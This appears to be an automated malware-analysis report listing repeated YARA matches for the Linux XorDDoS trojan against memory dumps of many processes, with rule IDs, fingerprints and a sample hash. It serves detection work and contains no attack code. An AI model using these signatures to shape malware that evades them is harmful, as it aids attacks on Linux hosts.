Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6440.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6338.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6387.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6443.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6438.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6461.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6353.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6463.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6384.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6435.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_884cab60 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 47895e9c8acf66fc853c7947dc53730967d5a4670ef59c96569c577e1a260a72, id = 884cab60-214f-4879-aa51-c00de1a5ffc4, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_ba961ed2 reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = fff4804164fb9ff1f667d619b6078b00a782b81716e217ad2c11df80cb8677aa, id = ba961ed2-b410-4da5-8452-a03cf5f59808, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2084099a os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = dfb813a5713f0e7bdb5afd500f1e84c6f042c8b1a1d27dd6511dca7f2107c13b, id = 2084099a-1df6-4481-9d13-3a5bd6a53817, last_modified = 2021-09-16
Source: 6345.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: MALWARE_Linux_XORDDoS author = ditekSHen, description = Detects XORDDoS
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_2aef46a6 os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = e583729c686b80e5da8e828a846cbd5218a4d787eff1fb2ce84a775ad67a1c4d, id = 2aef46a6-6daf-4f02-b1b4-e512cea12e53, last_modified = 2021-09-16
Source: 6229.1.0000000008048000.00000000080cf000.r-x.sdmp, type: MEMORY	Matched rule: Linux_Trojan_Xorddos_0eb147ca reference_sample = 45f25d2ffa2fc2566ed0eab6bdaf6989006315bbbbc591288be39b65abf2410b, os = linux, severity = x86, creation_date = 2021-01-12, scan_context = file, memory, license = Elastic License v2, threat_name = Linux.Trojan.Xorddos, fingerprint = 6a1667f585a7bee05d5aece397a22e376562d2b264d3f287874e5a1843e67955, id = 0eb147ca-ec6d-4a6d-b807-4de8c1eff875, last_modified = 2021-09-16
